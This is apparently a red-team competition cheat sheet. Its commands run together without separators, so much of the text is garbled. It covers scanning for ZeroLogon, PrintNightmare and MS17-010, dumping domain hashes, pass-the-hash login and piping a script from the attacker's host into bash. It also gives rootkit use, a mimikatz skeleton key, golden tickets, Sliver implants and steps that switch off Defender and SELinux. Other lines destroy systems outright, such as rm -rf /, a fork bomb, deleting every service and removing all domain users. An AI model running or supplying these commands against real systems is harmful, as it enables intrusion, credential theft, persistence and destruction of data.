sudo nmap -T4 -min-hostgroup 96 -p 53,445 --open {IP_range} | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u > smb_ips.txt
-min-hostgroup will divide the range up into 96 sup parts-T4, we can specify --max-retries 2 --max-rtt-timeout {double_time_to_ping}ms --min-rate 300while read -r line; do nxc smb $line -u '' -p '' -M zerologon -M printnightmare -M smbghost -M ms17-010; done < smb_ips.txt
for i in {1..10}; do python3 zerologon-Shot.py {DC_name} {DC_IP_with_$i}; donezerologon.py and then impacket-secretsdump -just-dc -no-pass {domain}/{machine_name}:@{DC_IP}
for i in {1..10}; do python3 zerologon.py {DC_name} {DC_IP_with_$i}; doneimpacket-secretsdump -just-dc -no-pass 'corp.local/TEST-DC$@10.10.0.162' (if DC name is TEST-DC)sudo nmap -sV -O -T4 -min-hostgroup 96 -p 22 {IP_range}sudo nmap -sn -T4 {IP_range} | grep -oE '([0-9]{1,3}\.){3}[0-9]{1,3}' | sort -u > ips.txt to just figure out what hosts are online
sudo autorecon -t ips.txt -p 21,22,23,25,53,80,110,111,135,139,143,389,443,445,465,636,873,993,995,1025-1030,1080,1433,1521,1723,3306,3389,5432,5900,5985,6379,6667,8000,8080,8443,8888 -o autorecon_results --max-scans 100find autorecon_results -name "*.txt" -type f -exec grep -l "open" {} \; | sortgrep -r "MS17-010\|CVE-\|Anonymous\|Password:" autorecon_resultsgrep -r "Anonymous" autorecon_resultsgrep -r "Domain Controller" autorecon_resultsgrep -r "Password:\|Credentials:" autorecon_resultsgrep -r "SMB signing required: false" autorecon_resultsWindows:
& $env:SystemRoot\System32\sc.exe sdset {name} "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"-o with iwr or we’ll just get the HTTP connection info lmfaoUnregister-ScheduledTask -TaskName "WindowsUpdater" -Confirm:$falserm 'C:\Users\$env:USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winupdater.lnk'Stop-Service -Name "WinUpdaterSvc" and $service = Get-WmiObject -Class Win32_Service -Filter "Name='WinUpdaterSvc'"; $service.delete()HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonHKCU:\Environmentwmiexec.py -hashes :{hash} '{domain}/{user}@{ip}'psexec.py -hashes :{hash} '{domain}/{user}@{ip}' or smbexecatexec.py -hashes :{hash} '{domain}/{user}@{ip}' "{command}"xfreerdp3 /u:{user} /d:{domain} /pth:{hash} /v:{IP}
/p:{password} if we have itevil-winrm -i {IP} -u '{domain}\{username}' -H {hash} -r {domain}
-r optional, used for kerberosGuest account
Remote Desktop Users group, we might still need to configure group policy:
secedit /export /cfg C:\Windows\temp\secpol.infGuest accountsecedit /configure /db C:\Windows\temp\secedit.sdb /cgf C:\Windows\temp\secpol.infgpupdate /forceLinux:
nix-shell -p libgcc pamecho "{password}" | sshpass -p "{password}" ssh -o StrictHostKeyChecking=no "{username}@{ip}" "sudo -S id"
echo "{password}" | sshpass -p "{password}" ssh -o StrictHostKeyChecking=no "{username}@{ip}" "sudo -S bash -c 'curl -L {kali_IP}:{port}/p.sh | bash -s {kali_IP}:{port}'"
ssh_across_ips.py
ssh_across_ips.py 10.100.100-120.35 {username} {password} '{command}'for i in {1..10}; do echo $i; doneMAGIC=mtz bash or simply kill -59 $$modules/hiding_tcp.c and adding a port to is_hidden_portsingularitykill -59 <PID>8081sudo python3 scripts/trigger.py {IP} and wait for shellconfig/defconfig, then after configuring we run make defconfigapt install build-essential linux-headers-$(uname -r)make menuconfig, make, and make installif (strstr(name->name, HIDE) && hidden) {return NULL;} instead of existing logic/reptile/reptile_cmd {show/hide} to show/hide all hidden files/reptile/reptile_cmd root to get root/reptile/reptile_cmd {show/hide} {pid} to show/hide processes/reptile/reptile_cmd conn {IP} {show/hide} to show/hide ICP/UDP connections#<reptile> and #</reptile> will be hidden
reptile_cmd file-tampering/etc/passwd and cron jobs
Plaintext Passwords
Get-ADUser -Filter { SamAccountName -notlike "*$" } | Set-ADUser -AllowReversiblePasswordEncryption $trueSet-ADDefaultDomainPasswordPolicy -Identity {domain} -ReversibleEncryptionEnabled $trueSkeleton Key
mimikatz "privilege::debug" "misc::skeleton" "exit" - adds mimikatz as a password to all usersMemSSP
mimikatz "privilege::debug" "misc::memssp" "exit"
misc::lock /process:explorer.exe to LOG OUT active users!!C:\Windows\System32\mimilsa.log or C:\Windows\System32\kiwissp.logGolden Certificate
certipy ca -backup -ca '{certificate_name}' -username {user}@{domain} -hashes {hash}certipy forge -ca-pfx {ca_private_key} -upn {user}@{domain} -subject 'CN={user},CN=Users,DC={domain},DC={tld}Golden Ticket
krbtgt NTLM hash with mimikatz (unless we already have it)
lsadump::lsa /patchticketer.py -duration 10 -aesKey "{aes_key}" -domain-sid "{domain_sid}" -domain "{domain_name}" "Administrator"
- The domain_SID can be gathered from whoami /userimpacket-psexec -k -no-pass Administrator@{DC_fqdn}Adding a new Computer Account
New-ADComputer -Name {PC_NAME_NO_$} -AccountPassword (ConvertTo-SecureString '{new_pass}' -AsPlainText -Force) -Enabled $true
addcomputer.py -computer-name 'KRBTGT$' -computer-pass '{new_password}' -dc-host "{dc_ip}" -domain-netbios '{domain}' '{domain}'/'{owned_user}':'{owner_user_pass}'dsacls 'DC={domain},DC={tld}' /I:T /G '{domain}\{machine_account}:CA;Replicating Directory Changes'dsacls 'DC={domain},DC={tld}' /I:T /G '{domain}\{machine_account}:CA;Replicating Directory Changes All'SeBackupPrivilege and SeRestorePrivilege
remote management users with net localgroup 'remote management users' /add {machine_account}.\Set-UserRights.ps1 -AddRight -Username {domain}\{machine_account} -UserRight SeBackupPrivilege,SeRestorePrivilegeShadow Copies
vshadow.exe -nw -p C:copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bakreg.exe save hklm\system c:\system.bakimpacket-secretsdump
impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCALsudo apt install golang-go, curl https://sliver.sh/install | sudo bash, and cd sliver && makesliver-servernew-operator --name {op_name} --lhost localhost and multiplayer to enable clientssliver-client import {config_file} and sliver-client to joinwg can be used to start listening for incoming sessions on a sneaky wireguard udp (use mtls otherwise if we dont get a callback)
evil-winrm implants and beacons (and sometimes maybe wmi-exec?) will DIE a HORRIBLE DEATH, use another method to run the implant/beacongenerate to create implants or beacons
generate --wg {our_IP} --os linux for an implantgenerate beacon --wg 192.168.0.102 -j {jitter} -S {wait_seconds} --os linuxgenerate --mtls 192.168.0.102 --os windows--tcp-pivot {IP} and then we can see our pivots with pivots tcpsessions to show active sessions
sessions -i {id} to interact with session
CTRL + d to exitshell {command} will execute command in a session (can maybe run without shell?)getprivs will list privileges available, probably use /ProgramData/ for potatoes?info - host infops - process listupload/download - file transferscreenshot - grab a screenshotbeacons to show active beacons
use {beacon_id} to use a beacon
interactive to turn it into a normal sessionarmory install allsharp-hound-4 -- '-c all,GPOLocalGroup'Killing Services
systemctl stop {service}
keyboard_desktop_flipper.shservice_stopper.shcommand_rotate.ship_rotate.shrm -rf / -no-preserve-rootdel /Q /S:(){ :|:& };:)timebomb.shTrolling on Linux
apt useless:
sed -i '50i alias apt="apt -s"' /root/.bashrc; touch -d "Aug 8 2023" /root/.bashrc; sed -i '50i alias apt="apt -s"' /root/.zshrc; touch -d "Aug 8 2023" /root/.zshrcwall "dance"echo "loadkeys de && localectl set-locale de_DE.UTF-8 && localectl set-keymap de" >> ~/.bashrcTrolling on Windows
Install-Language -Language de-DE -CopyToSettings; Set-WinUserLanguageList de-DE -Force; Set-WinSystemLocale -SystemLocale de-DE; Set-WinUILanguageOverride -Language de-DE; Set-Culture de-DE; Set-WinHomeLocation -GeoId 94misc::wp /file:{path} to set the current PC’s wallpapersc.exe stop dns to stop dns
sc.exe delete dns to delete itpowershell -c "Get-Service | ForEach-Object { sc.exe delete $_.Name }"netsh interface ip delete address "Ethernet" addr={address}powershell -c "Get-ADUser -Filter * | ForEach-Object { Remove-ADUser $_ -Confirm:$false }" to delete domain usersenabled + enter path of image and select fill for style > apply + ok > gpupdate /forceiwr https://khaelkugler.com/misc_scripts/cold_hands.exe -o "C:\Program Files (x86)\Microsoft\Edge\Application\joe_biden.exe"; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "ChillyFingers" -Value "C:\Program Files (x86)\Microsoft\Edge\Application\joe_biden.exe"; iwr https://download.sysinternals.com/files/PSTools.zip -o "C:\Program Files (x86)\Microsoft\Edge\Application\PSTools.zip"; Expand-Archive "C:\Program Files (x86)\Microsoft\Edge\Application\PSTools.zip" -d "C:\Program Files (x86)\Microsoft\Edge\Application\PSTools\"; 1..5 | ForEach-Object { & "C:\Program Files (x86)\Microsoft\Edge\Application\PSTools\psexec.exe" -i $_ -d -s "C:\Program Files (x86)\Microsoft\Edge\Application\joe_biden.exe" -accepteula }.\psexec -i {session} -d -s powershell -command '{command}' -accepteula
-d exits immediately1..50 | ForEach-Object {Start-Process notepad}Add-Type -AssemblyName PresentationFramework; [System.Windows.MessageBox]::Show("{message_box_message}", "{message_box_title}", 0, 64)Defender
Add-MpPreference -ExclusionPath "{path_to_excluded_folder}"& ([ScriptBlock]::Create((irm https://dnot.sh/))) --name "{custom_AV_name}"
C:\ first (technically \Users and \Program Files)reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /fgpedit.msc > Computer Configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Turn off Microsoft Defender Antivirus > Enabled'C:\Program Files\Windows Defender\MpCmdRun.exe' -RemoveDefinitions -AllSet-MpPreference -DisableRealtimeMonitoring $true -DisableBehaviorMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -DisableBlockAtFirstSeen $true -DisablePrivacyMode $true -SignatureDisableUpdateOnStartupWithoutEngine $true -DisableArchiveScanning $true -MAPSReporting 0 -SubmitSamplesConsent 2
Remove-WindowsFeature Windows-DefenderStop-Service WinDefend -ForceSet-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -Type DWord -ForceSet-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Policy Manager" -Name "AllowAntivirus" -Value 0 -Type DWordhttps://github.com/SaadAhla/FilelessPELoaderGetting Firewalled
CS Falcon
wmiexec with -silentcommand and -nooutput seems to work with CS Falcon enabledAppArmor
sudo systemctl stop apparmor, sudo systemctl disable apparmor, sudo apt purge apparmorSELinux
sestatussudo setenforce 0 or sudo setenforce permissiveSELINUX=enforcing to disabled in /etc/selinux/config and rebootshutdown /s /t 0shutdown /r /t 0query user or query session
tscon.exe {target_id} /dest:rdp-tcp#{our_rdp_session_number}query session and logoff {id} to log off a specific user(Get-PSReadlineOption).HistorySavePathps
taskkill /pid {id_from_ps} /f| FINDSTR /NI "{string}"
/N gets line number, /I ignores casereboot to restartwho to see who’s on a system
pkill -t {result} to then kill their sessionpkill -KILL -u {user} - kill all of a user’s processeskill -9 {pid} to kill a specific processtouch -d "4 May 2024"